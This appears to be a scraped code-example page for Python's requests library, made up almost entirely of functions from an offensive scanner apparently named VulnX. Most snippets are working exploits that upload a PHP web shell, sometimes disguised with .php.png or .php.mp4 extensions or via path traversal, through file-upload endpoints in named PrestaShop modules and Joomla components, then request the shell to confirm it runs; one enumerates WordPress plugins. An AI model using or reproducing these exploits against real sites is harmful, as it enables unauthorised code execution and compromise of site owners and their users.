requests.get.text - python examples

Here are the examples of the python api requests.get.text taken from open source projects. By voting up you can indicate which examples are most useful and appropriate.

145 Examples 7

3 View Complete Implementation : prestaExploits.py
Copyright GNU General Public License v3.0
Author : anouarbensaad
def wg24themeadministration(url,headers):
    endpoint = url + "/modules//wg24themeadministration/wg24_ajax.php"
    img = open('shell/VulnX.php', 'rb')
    name_img= os.path.basename('shell/VulnX.php')
    files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}),
            'type' : 'pattern_upload' }
    upload_file = Session.post(endpoint,files=files)
    shellup = url + "/modules/wg24themeadministration/img/upload/VulnX.php?Vuln=X"
    checkShell = requests.get(shellup).text
    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
    if statusCheck:
        print(' %s wg24themeadmin        %s    %s' %(que,vulnexploit,shellup))
    else:
        print(' %s wg24themeadmin        %s' %(que , failexploit))

3 View Complete Implementation : prestaExploits.py
Copyright GNU General Public License v3.0
Author : anouarbensaad
def vtslide(url,headers):
    endpoint = url + "/modules/vtermslideshow/uploadimage.php"
    img = open('shell/VulnX.php', 'rb')
    name_img= os.path.basename('shell/VulnX.php')
    files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
    upload_file = Session.post(endpoint,files=files)
    shellup = url + "/modules/vtermslideshow/slides/VulnX.php?Vuln=X"
    checkShell = requests.get(shellup).text
    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
    if statusCheck:
        print(' %s vterm-slideshowbar    %s    %s' %(que,vulnexploit,shellup))
    else:
        print(' %s vterm-slideshowbar    %s' %(que , failexploit))  

3 View Complete Implementation : jooExploits.py
Copyright GNU General Public License v3.0
Author : anouarbensaad
def com_jbcatalog(url,headers):
    endpoint = url + "/components/com_jbcatalog/libraries/jsupload/server/php"
    img = open('shell/VulnX.php', 'rb')
    name_img= os.path.basename('shell/VulnX.php')
    fieldname = "image[]"
    files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
    data = { fieldname : files }
    upload_file = Session.post(endpoint,data)
    shellup = url + "/components/com_jbcatalog/libraries/jsupload/server/php/files/VulnX.php?Vuln=X"
    checkShell = requests.get(shellup).text
    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
    if statusCheck:
        print(' %s com_jbcatalog         %s    %s' %(que,vulnexploit,shellup))
    else:
        print(' %s com_jbcatalog         %s' %(que , failexploit))

3 View Complete Implementation : prestaExploits.py
Copyright GNU General Public License v3.0
Author : anouarbensaad
def attributewizardpro_x(url,headers):
    endpoint = url + "/modules/attributewizardpro_x/file_upload.php"
    img = open('shell/VulnX.php', 'rb')
    name_img= os.path.basename('shell/VulnX.php')
    files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
    upload_file = Session.post(endpoint,files=files)
    shellup = url + "/modules/attributewizardpro_x/file_uploads/VulnX.php?Vuln=X"
    checkShell = requests.get(shellup).text
    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
    if statusCheck:
        print(' %s attributewizardpro    %s    %s' %(que,vulnexploit,shellup))
    else:
        print(' %s attributewizardpro    %s' %(que , failexploit))  

3 View Complete Implementation : prestaExploits.py
Copyright GNU General Public License v3.0
Author : anouarbensaad
def columnadverts(url,headers):
    endpoint = url + "/modules/columnadverts/uploadimage.php"
    img = open('shell/VulnX.php', 'rb')
    name_img= os.path.basename('shell/VulnX.php')
    files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
    upload_file = Session.post(endpoint,files=files)
    shellup = url + "/modules/columnadverts/slides/VulnX.php?Vuln=X"
    checkShell = requests.get(shellup).text
    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
    if statusCheck:
        print(' %s column-advert         %s    %s' %(que,vulnexploit,shellup))
    else:
        print(' %s column-advert         %s' %(que , failexploit))    

3 View Complete Implementation : prestaExploits.py
Copyright GNU General Public License v3.0
Author : anouarbensaad
def videostab(url,headers):
    endpoint = url + "/modules/videostab/ajax_videostab.php?action=submitUploadVideo%26id_product=upload"
    img = open('shell/VulnX.php.mp4', 'rb')
    name_img= os.path.basename('shell/VulnX.php.mp4')
    files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
    upload_file = Session.post(endpoint,files=files)
    shellup = url + "/modules/videostab/uploads/VulnX.php.mp4?Vuln=X"
    checkShell = requests.get(shellup).text
    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
    if statusCheck:
        print(' %s videostab             %s    %s' %(que,vulnexploit,shellup))
    else:
        print(' %s videostab             %s' %(que , failexploit))

3 View Complete Implementation : jooExploits.py
Copyright GNU General Public License v3.0
Author : anouarbensaad
def com_rokdownloads(url,headers):
    endpoint = url + "/administrator/components/com_rokdownloads/astets/uploadhandler.php"
    img = open('shell/VulnX.php', 'rb')
    name_img= os.path.basename('shell/VulnX.php')
    fieldname = "Filedata"
    files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
    data = { fieldname : files,
             'jpath' : '..%2F..%2F..%2F..%2F',
             }
    upload_file = Session.post(endpoint,data)
    shellup = url + "/images/stories/VulnX.php?Vuln=X"
    checkShell = requests.get(shellup).text
    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
    if statusCheck:
        print(' %s com_rokdownloads      %s    %s' %(que,vulnexploit,shellup))
    else:
        print(' %s com_rokdownloads      %s' %(que , failexploit))

3 View Complete Implementation : wpGrabber.py
Copyright GNU General Public License v3.0
Author : anouarbensaad
def wp_plugin(url,headers,grabinfo):
    plugins_array = []
    ep = url
    getplugin = requests.get(ep,headers).text
    matches = re.findall(re.compile(r'wp-content/plugins/(\w+)?/'),getplugin)
    if len(matches) > 0:
        for plugin in matches:
                if plugin not in plugins_array:
                        plugins_array.append(plugin)
        for i in range(len(plugins_array)): 
                print (' %s Plugins : %s ' %(good , plugins_array[i]))

3 View Complete Implementation : prestaExploits.py
Copyright GNU General Public License v3.0
Author : anouarbensaad
def advancedslider(url,headers):
    endpoint = url + "/modules/advancedslider/ajax_advancedsliderUpload.php?action=submitUploadImage%26id_slide=php"
    img = open('shell/VulnX.php.png', 'rb')
    name_img= os.path.basename('shell/VulnX.php.png')
    files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
    upload_file = Session.post(endpoint,files=files)
    shellup = url + "/modules/advancedslider/uploads/VulnX.php.png?Vuln=X"
    checkShell = requests.get(shellup).text
    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
    if statusCheck:
        print(' %s advancedslider        %s    %s' %(que,vulnexploit,shellup))
    else:
        print(' %s advancedslider        %s' %(que , failexploit))  

3 View Complete Implementation : prestaExploits.py
Copyright GNU General Public License v3.0
Author : anouarbensaad
def cartabandonmentpro(url,headers):
    endpoint = url + "/modules/cartabandonmentpro/upload.php"
    img = open('shell/VulnX.php.png', 'rb')
    name_img= os.path.basename('shell/VulnX.php.png')
    files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) }
    upload_file = Session.post(endpoint,files=files)
    shellup = url + "/modules/cartabandonmentpro/uploads/VulnX.php.png?Vuln=X"
    checkShell = requests.get(shellup).text
    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
    if statusCheck:
        print(' %s cartabandonmentpro    %s    %s' %(que,vulnexploit,shellup))
    else:
        print(' %s cartabandonmentpro    %s' %(que , failexploit))